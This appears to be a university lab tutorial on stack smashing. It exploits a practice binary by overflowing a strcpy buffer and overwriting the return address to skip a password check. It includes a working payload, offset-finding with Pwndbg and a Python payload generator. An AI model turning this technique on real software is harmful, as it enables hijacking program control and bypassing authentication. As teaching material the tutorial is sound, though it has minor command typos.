Guided Example
Stack smashing is a type of buffer overflow attack where an attacker overwrites a program's call stack, typically by overflowing a buffer. Doing so the attacker can corrupt a return address on the stack and hijack the program's control flow, to e.g. bypass security check, spawn a shell, and more generally execute malicious code. A classic explanation of the stack smashing attack can be found in Aleph One’s seminal Phrack article: Smashing The Stack For Fun And Profit.
To demonstrate an example of stack smashing, we assume the following scenario: we consider a program containing a security check (e.g. password or license key verification). We (the attacker) do not have knowledge of the secret allowing to pass the check legitimately, and there is no simple way to extract it as we did in lab 1. Hence, our goal is going to be to bypass the security check, by taking over the program execution's flow. The program is distributed in binary form, and we do not have access to its source code.
Getting and Running the Target Binary
Download this binary.
After the download you may need to give it execution rights with chmod +x smashme01.
This program contains a password check.
The user enters their password attempt as a command line parameter:
./smashme01
usage: ./smashme01 <password>
./smashme01 test
Authentication failed
Analysing the Target Binary with checksec
Let's start by analysing the program with checksec, which is a command-line tool that inspects compiled binaries to display their security-related properties.
If checksec is not already on your machine, install it:
mkdir -p ~/Software wget https://github.com/slimm609/checksec/tarball/main -O ~/Software/checksec.tar.gz cd ~/Software && tar xf checksec.tar.gz && mv slimm609-checksec-* checksec echo "alias checksec=~/Software/checksec/checksec.bash" >> ~/.bashrc source ~/.bashrcAdapt these steps to your environment (e.g. you may use a different shell).
checksec --file=smashme01
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX disabled No PIE No RPATH No RUNPATH 5 Symbols No 0 2 smashme01
This looks promising, here we can see that:
- The stack canary, which is a protection against buffer overflows on the stack, is disabled. It means we will be able to exploit such overflows.
- Position Independent Code (PIE) is disabled. This built time option, when enabled, allow the location where the binary is loaded in the address space to be randomised (i.e. different) each time the program is launched. No randomisation means we will mostly get the same memory layout throughout subsequent executions, which makes it easier to study.
- Symbols are present: symbols are things like function and global variable names. The fact that they are present in the binary means that disassembly/decompilation will be able to do a better job, e.g. break down the code section into functions, identify them by their name, etc.
Disassembling and Decompiling the Target Binary
If we disassemble the program with objdump, we can see that it is made up of a few functions, including:
maininitvalidatedo_important_stuff- Other functions which name cannot be recovered
Let's study a few of these functions more in detail.
Decompiling the program (e.g. with RetDec) will allow us to get a better understanding of what they do.
Let's start by looking at main.
Decompiled by RetDec it looks like that (you may see different values for the addresses):
// Address range: 0x401a94 - 0x401b21
int main(int argc, char ** argv) {
int64_t * v1 = (int64_t *)((int64_t)argv + 8); // 0x401add
init(*v1);
if ((int32_t)validate(*v1) == 0) {
// 0x401b0b
puts("Authentication failed");
} else {
// 0x401aff
do_important_stuff();
}
// 0x401b1a
return 0;
}
We can see that main gets the first command line argument from argv (argv + 8 corresponds to argv[1]), passes it to init, then to validate.
If validate returns 0, it prints Authentication failed, else it calls do_important_stuff.
Decompiled, do_important_stuff looks like this:
int64_t do_important_stuff(void) {
// 0x401a06
puts("Authentication successful");
// ...
}
Clearly, this function is executed on the code path taken when authentication succeeds: that will be where we want to jump when we hijack the execution flow.
Now let's look at validate:
int64_t validate(int64_t str) {
int64_t result = 0; // 0x4018bc
if (strlen((char *)str) == 40) {
// 0x4018c5
int64_t str2; // bp-152, 0x401885
function_4016aa(str, &str2);
result = memcmp(&g1, &str2, 40) == 0;
}
// 0x401905
return result;
}
This function performs a length check on the password attempt (str), then passes it as parameter to another function (function_4016aa) alongside the address of a local variable str2.
The local variable is then compared with memcmp to a global variable g1, and validate returns 0 if the comparison fails (memcmp returned something else than 0), and 1 if it succeeds (memcmp returned 0).
Recall that from how it is called in main, we know that validate returns 0 if the authentication failed, and something else if it succeeded.
The validate function presents a structure typical of a hash check: the password attempt str is hashed into str2, and that hash is compared to g1 which is probably the hash of the correct password.
We can also conclude that function_4016aa implements the hashing logic.
Although we can extract the hash of the correct password, we won't be able to crack it with a bruteforce or dictionary attack: for this exercise the passwords have been generated to be long and complex enough to be uncrackable in a reasonable time.
Moreover, the hashing method seems custom and hard to reverse-engineer (function_4016aa is quite complex).
Instead, we are going to attempt to entirely bypass the check, i.e. force the CPU to jump directly to do_important_stuff without calling validate and checking its return value.
Let's now have a look at init:
int64_t init(int64_t str2) {
// 0x401a6e
int64_t str; // bp-40, 0x401a6e
return (int64_t)strcpy((char *)&str, (char *)str2);
}
This function calls strcpy to copy the password attempt coming from the command line (str2) into str, which points to the stack (bp is the base pointer that at runtime will point to the base of the stack frame for function).
Given how strcpy works, str points to a buffer of fixed size, and as we can observe the program makes no attempt to check that str2 will not overflow that buffer.
To try to trigger the overflow, call the program with an abnormally long string given as password attempt:
./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[1] 20866 segmentation fault ./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Function Calls and the Stack
Recall from the lectures that the machine code generated by the compiler pushes the return address on the stack upon a function call, and pops it then jumps to it when that function returns:
So with our target program, our goal to bypass the validation of the password attempt will be to overflow the buffer during function's execution through the strcpy in such a way to replace the return address with the address of our target: do_important_stuff.
Doing so, when function returns, the CPU will jump to do_important_stuff, bypassing the password check.
Understanding the Address Space Layout
Attack Payload: Overview
We have control over the data that will be written on the stack through the overflow: indeed that data comes from the command line argument passed to the program. The question here is what exactly should we pass as command line parameter so that the address of the function we want to jump to ends up written in the exact return address slot. This is our payload, and we should determine 1) how long should it be and 2) what should it contain for the attack to succeed. Our payload should be a concatenation of two things:
- A certain amount of padding corresponding to the distance between the start of the buffer we overflow and the return address slot on the stack (see diagram above).
- The address of
do_important_stuffto be written in the return address slot.
Determining the address of do_important_stuff is easy: from our investigation with checksec we know that the program does not support PIE so the address of do_important_stuff will always be the same among different invocations of the program.
It can be determined e.g. in objdump's output:
objdump --disassemble smashme01 | grep do_important_stuff
0000000000401a06 <do_important_stuff>:
Here its address is 0x401a06 (it may be different on your computer).
To determine how much padding our payload should contain before that address, we need to understand the memory layout on the stack at the time the overflow occur. To that aim we will use GDB and an addon called Pwndbg, which offers a better interface and many helpful features for reverse engineering.
Installing and Running Pwndbg
To install Pwndbg download a release as follows:
mkdir -P ~/Software
cd ~/Software
wget https://github.com/pwndbg/pwndbg/releases/download/2025.04.18/pwndbg_2025.04.18_x86_64-portable.tar.xz
tar xf pwndbg_2025.04.18_x86_64-portable.tar.xz && rm pwndbg_2025.04.18_x86_64-portable.tar.xz
echo "export PATH=\$PATH:~/Software/pwndbg/bin" >> ~/.bashrc
source ~/.bashrc
Pwndbg can then be launched as follows:
pwndbg smashme01
pwndbg>
To explore the Pwndbg's interface, place a breakpoint on main and run the program until it is hit:
pwndbg> break main
Breakpoint 1, 0x0000000000401a9c in main ()
pwndbg> run
Once the breakpoint is hit Pwndbg will display a lot more information vs. vanilla GDB. The screen is divided into 4 main blocks:
REGISTERSdisplays the content of the registers: the general purpose onesRAXtoR15, the base pointerRBP, the stack pointerRSP, as well as the instruction pointerRIP.DISASMdisplays a disassembly of the machine code, with the next instruction to be executed having its address highlighted in green.STACKgives the content of the stack, one stack slot per line. The address of each slot is given on the right, and its content on the left. The first line represents the top of the stack, notice that its address is the same as the content of the stack pointer registerRSP.BACKTRACEshows the function call stack: the CPU currently runs belonging tomain, which was previously called by__libc_start_call_main, which itself was called by__libc_start_main, which was called by_start. These last 3 functions implement the C standard library code that runs beforemainis invoked.
Pwndbg supports all GDB commands (e.g. break, run, etc.) and provides additional ones.
You can explore these commands on this cheat sheet and on the relevant documentation.
Determining the Amount of Padding
Let's start by setting a breakpoint in the function containing the overflow, init, and run the program with a dummy password, xxx.
pwndbg> break init
Breakpoint 1 at 0x401a76
pwndbg> run xxx
When the breakpoint is hit, use the ni command to continue execution until the call to strcpy is highlighted, i.e. right before that call is made:
► 0x401a8c <init+30> call strcpy@plt <strcpy@plt>
dest: 0x7fffffffdaf0 ◂— 0
src: 0x7fffffffe00a ◂— 0x474e414c00787878 /* 'xxx' */
Pwndbg is aware of the calling convention and indicates the value of strcmp's parameters:
- The source
srcpoints to the dummy password attempt we entered,xxx - The destination
destpoints to the buffer that we are going to overflow, here its value is0x7fffffffdaf0.
Now to understand how much padding we need to include in our payload, we need to know how many bytes separate 0x7fffffffdaf0 from the location of the return address on the stack.
The return address is located right before the base pointer, so we can display it with the following command:
pwndbg> x/gx $rbp+8
0x7fffffffdb18: 0x0000000000401ae8
Remember that the stack grows down so here we are looking at the 8 bytes present right before the base pointer.
The return address is then 0x401ae8 (location in main where it was called), and it is located on the stack at 0x7fffffffdb18.
We can now compute the distance between the return address 0x7fffffffdb18 and the first byte of the buffer we are going to overflow 0x7fffffffdaf0.
In a separate terminal:
$ python3 -c "print(0x7fffffffdb18 - 0x7fffffffdaf0)"
40
Our payload will then be 40 bytes of padding, followed by the address of do_important_stuff.
Smashing the Stack
We determined earlier the address of do_important_stuff to be 0x401a06, so the execution of our attack is as follows:
$ ./smashme01 $'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x06\x1a\x40\x00\x00\x00\x00\x00'
The first 40 characters (each 1 byte) can be anything. Notice how the address we want to jump to is written backwards. This is because x86-64 is little-endian: the least significant byte of a multi-byte data type is stored at the lowest memory address.
The program should display the password that you have to submit to validate the exercise.
An Easier Way to Determine Padding Size
Determining the amount of padding required manually as we did can be quite cumbersome. An easier method, provided by Pwndbg, is to use a cyclic pattern. This is a long, unique, non-repeating sequence of characters, that we will use to overflow the buffer. Looking at what part of that sequence the execution flow ends up jumping to after the return address is overwritten will let Pwndbg compute easily the distance between the start of the buffer overflow, and the return address location.
To generate the cyclic pattern, we can use the built-in cyclic function within pwndbg.
This is an example for generating 200 bytes of cyclic pattern:
pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
⚠️ For some reason using
cyclicbefore havingrunthe program in a Pwndbg session at least once leads to problems. Each time you launch Pwndbg make sure to typerunat least once before usingcyclic.
Your cyclic function may generate a different pattern.
Now run the program and copy paste the patter as its command line parameter:
pwndbg> run aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
Part of this pattern will overwrite the return value, then the CPU will try to jump to the overwritten value. Because it does not correspond to a valid address, the program will crash and Pwndbg will indicate us where the CPU tried to jump:
► 0x401a93 <init+37> ret <0x6161616161616166>
This is the subset of the pattern (in hexadecimal) that overwrote the return address. Pwndbg has a convenient function to locate the offset of that subset from the start of the last pattern generated:
pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40
And there we have it: this is the distance between the start of the overflown buffer and the return address, i.e. the amount of padding required for our payload.
Quick Payload Generation with Python
Rather than writing the payload manually, a quick and easy way to generate it is with Python, writing the payload on a file:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + (0x401a06).to_bytes(8, 'little'))" > input.txt
$ ./smashme01 $(cat input.txt)
Here 40 is the amount of padding added, and 0x401a06 is our jump target.
Submission Instructions
Input the password extracted on the corresponding line of the CSV file in the submission git repository, i.e.:
smashme01,password-here